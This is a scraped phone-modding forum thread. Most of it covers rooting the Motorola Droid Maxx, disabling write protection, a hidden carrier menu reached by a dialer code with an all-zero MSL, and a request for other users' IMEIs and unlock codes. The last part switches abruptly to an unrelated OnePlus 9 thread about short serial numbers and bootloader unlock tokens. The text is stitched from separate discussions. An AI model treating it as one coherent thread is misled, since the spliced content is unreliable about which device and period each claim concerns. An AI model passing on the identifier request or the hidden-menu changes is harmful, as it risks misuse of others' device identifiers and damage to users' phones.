Ok, i have gotten it to work!! A simple 4 minute process that ia automated which roots your phone proper 4.4 instead of tethered and also changes the write protection to 0 no matter how many times you reboot.
Working on the directions right now and also screen shots, I understand I am not a reputable member here since I barely ever speak up but if there i anyone familiar with assembly that would like to review my code you are more than welcome to, I started with C#, then went to C, and ended up having to use assembly to do it... crazy..
Now, just need the algorithm to pop the boot loader yes? If someone would like to supply me via PM how I can get an unlock code for this phone or how I could get 3 or 4 imei with their unlock codes it would make this process much faster.
I look forward to see your automated release sounds awesome. Also I hope you can get the bootloader unlocked at that point I will donate to you 100.00 since I have a 2013 model and the China Man Cant Come Through on 2013 models only 2014 !!!!!!
Thanks,
rbgCODE said:
Ok, i have gotten it to work!! A simple 4 minute process that ia automated which roots your phone proper 4.4 instead of tethered and also changes the write protection to 0 no matter how many times you reboot.
Working on the directions right now and also screen shots, I understand I am not a reputable member here since I barely ever speak up but if there i anyone familiar with assembly that would like to review my code you are more than welcome to, I started with C#, then went to C, and ended up having to use assembly to do it... crazy..
Now, just need the algorithm to pop the boot loader yes? If someone would like to supply me via PM how I can get an unlock code for this phone or how I could get 3 or 4 imei with their unlock codes it would make this process much faster.
Click to expand...
Click to collapse
bluh5d said:
I look forward to see your automated release sounds awesome. Also I hope you can get the bootloader unlocked at that point I will donate to you 100.00 since I have a 2013 model and the China Man Cant Come Through on 2013 models only 2014 !!!!!!
Thanks,
Click to expand...
Click to collapse
I appreciate that but I am not doing this for the bounty, I am a strong believer in open source and I want to be able to use my phone to it's fullest. I think I have a 2013 model as well. oh no Build Date wed apr .. hmmm where is the actual build date lol
Hey man. Any progress? Could u at least release your root exploit. I already have permanent root, but some people aren't smart enough or savvy enough to turn the tethered root into a full root via Safestrap and flashing superSU, then use motowpnomo to disable write protection. Its no boot loader unlock though. That's what I'm interested in.
Sent from my XT1030 using XDA Premium 4 mobile app
rbgCODE said:
Ok, i have gotten it to work!! A simple 4 minute process that ia automated which roots your phone proper 4.4 instead of tethered and also changes the write protection to 0 no matter how many times you reboot.
Working on the directions right now and also screen shots, I understand I am not a reputable member here since I barely ever speak up but if there i anyone familiar with assembly that would like to review my code you are more than welcome to, I started with C#, then went to C, and ended up having to use assembly to do it... crazy..
Now, just need the algorithm to pop the boot loader yes? If someone would like to supply me via PM how I can get an unlock code for this phone or how I could get 3 or 4 imei with their unlock codes it would make this process much faster.
Click to expand...
Click to collapse
Best news I've heard in a while. Hope you're onto something. Please keep us posted? My 4.4 needs some root love
rbgCODE said:
I appreciate that but I am not doing this for the bounty, I am a strong believer in open source and I want to be able to use my phone to it's fullest. I think I have a 2013 model as well. oh no Build Date wed apr .. hmmm where is the actual build date lol
Click to expand...
Click to collapse
My build date is Dec 6, 2013. Employee Edition. Full rooted and write protection off. Just hoping for a bootloader crack. I was late on the whole bootloader china codes. Damn.
Hello
Got any news on unlocking the BL?
I've got Ultra assembled in 2014, if you need some testers I'm always ready to help:good:
Bootloader unlock for Motorola Devices with msm8960..
http://blog.azimuthsecurity.com/2013/04/unlocking-motorola-bootloader.html?m=1
iAjayIND said:
Bootloader unlock for Motorola Devices with msm8960..
http://blog.azimuthsecurity.com/2013/04/unlocking-motorola-bootloader.html?m=1
Click to expand...
Click to collapse
Uhhhh, our devices are msm8960dt...
Sent from my DROID MAXX using Tapatalk
iAjayIND said:
Bootloader unlock for Motorola Devices with msm8960..
http://blog.azimuthsecurity.com/2013/04/unlocking-motorola-bootloader.html?m=1
Click to expand...
Click to collapse
Did you even read the article it doesn't mention any of our phones.
sent from "my kungfu is stronger than yours" XT1080
Any new developments on this? I am THOROUGHLY interested! Would this be able to give us wp off again if we are on 4.4.4?
Sent from my XT1080 using XDA Free mobile app
is Chinese man stopped giving unlock codes for droid Maxx??I'm not getting any replay from him
Sent from my XT1080 using XDA Premium 4 mobile app
aneeshmbabu said:
is Chinese man stopped giving unlock codes for droid Maxx??I'm not getting any replay from him
Sent from my XT1080 using XDA Premium 4 mobile app
Click to expand...
Click to collapse
That has nothing to do with this thread.
Sent from my DROID MAXX using Tapatalk
I know in the past you needed to get it from Sprint or via a hack.. Just for giggles I went into *#*#3282#*#* and when I went to make a change and it asked for my msl all I did was ender in six zeros and could make changes If I choose. If you choose on multiple options within a menu it will aks for MSL again just enter the six zeros again, and you can make what ever changes you feel suit your needs.
PS don't mess with stuff you have no idea about..
Could this lead to a way to get the bootloader unlocked for those of us leasing the device
Edit : After looking through all the menus, I retract my question
BakedTator said:
Could this lead to a way to get the bootloader unlocked for those of us leasing the device
Click to expand...
Click to collapse
Only time will tell. For now what I would like to see is if somebody can come up with a guide on the benefits of changing anything inside those hidden menus.
I will say this okay. I was very surprised to find that the MSL code was all zeros that never happens.
BakedTator said:
Could this lead to a way to get the bootloader unlocked for those of us leasing the device
Edit : After looking through all the menus, I retract my question
Click to expand...
Click to collapse
I've been trying anything and everything I can think of. I don't really care if I need to factory reset. Using the Shortcut Master app I found something in the settings app. It's called "OemDMTrigger". I thought I found something, so naturally I deleted it with adb but I couldn't find any difference, my phone worked fine. I did restore it.
Can you unlock the Hotspot using this method?
NinjaJoe said:
Can you unlock the Hotspot using this method?
Click to expand...
Click to collapse
Not sure you'll have to go within the menus in try it out I guess
doubledragon5 said:
Not sure you'll have to go within the menus in try it out I guess
Click to expand...
Click to collapse
I have no where near the skill level required for that.
I hope this will give us a breakthrough
So weirdly enough, my serial number of the OnePlus 9 Tmo version only has 7-digits. I have tried adding a 0 to the front and back of the serial and it still will not submit. Anyone else run into this issue?
jivy26 said:
So weirdly enough, my serial number of the OnePlus 9 Tmo version only has 7-digits. I have tried adding a 0 to the front and back of the serial and it still will not submit. Anyone else run into this issue?
Click to expand...
Click to collapse
there are 3 ways to read the s/n. 1 under settings, about phone, status. 2 on the back of the phone on the white sticker if you did not remove it. 3 On the box the phone came in.
MrSteelX said:
there are 3 ways to read the s/n. 1 under settings, about phone, status. 2 on the back of the phone on the white sticker if you did not remove it. 3 On the box the phone came in.
Click to expand...
Click to collapse
Same here only 7 digits everywhere I look
PsYk0n4uT said:
Same here only 7 digits everywhere I look
Click to expand...
Click to collapse
Mean to mention mines the N20 tmob
same here with my t-mobile branded 9
tmobile has been known to replace these devices since their a manufacturer defect
jivy26 said:
So weirdly enough, my serial number of the OnePlus 9 Tmo version only has 7-digits. I have tried adding a 0 to the front and back of the serial and it still will not submit. Anyone else run into this issue?
Click to expand...
Click to collapse
i have the same problem, you find solution to request unlcock?
N1ldo said:
i have the same problem, you find solution to request unlcock?
Click to expand...
Click to collapse
get oneplus to escalate your case to level 3 techs, they can generate a custom token for you
PsYk0n4uT said:
get oneplus to escalate your case to level 3 techs, they can generate a custom token for you
Click to expand...
Click to collapse
I contacted an assistant in the chat, explained the situation and were to answer me within 24 to 48H, we will see.
N1ldo said:
I contacted an assistant in the chat, explained the situation and were to answer me within 24 to 48H, we will see.
Click to expand...
Click to collapse
dealing with oneplus, it may take weeks of going back and forth to get ur case escalated to someone who can actually do it but they did it for me. took several weeks but they finally got it to a level 3 tech that simply requested some info and i responded with the requested info and the next message they sent me an unlock token. knew exactly what i was wanting
PsYk0n4uT said:
dealing with oneplus, it may take weeks of going back and forth to get ur case escalated to someone who can actually do it but they did it for me. took several weeks but they finally got it to a level 3 tech that simply requested some info and i responded with the requested info and the next message they sent me an unlock token. knew exactly what i was wanting
Click to expand...
Click to collapse
I've been told to say to one (zero) before in the number but it didn't work, I've answered again saying it didn't work.
N1ldo said:
I've been told to say to one (zero) before in the number but it didn't work, I've answered again saying it didn't work.
Click to expand...
Click to collapse
They told me the same but it hasn't worked for anyone I've read of that's tried that. Just keep pushing. Tell them that it's bad business to sell defective devices. I mean tbh that's what it IS basically even if everything works perfectly except the serial/unlock issue. Honestly they should have a pretty direct route for doing this after enough people have to get these tokens generated. Their aware of the problem so it's not like it's a unique situation
Just wanted to chime in, just purchased an unlocked T-Mobile Oneplus 9 from Airtalk Wireless. Mine has a 6 character serial number. Hopefully it doesnt take even longer to get an unlock token since I am missing 2 characters.
Took a month but I got Oneplus to send me an unlock token .bin going to try and unlock the bootloader a bit later.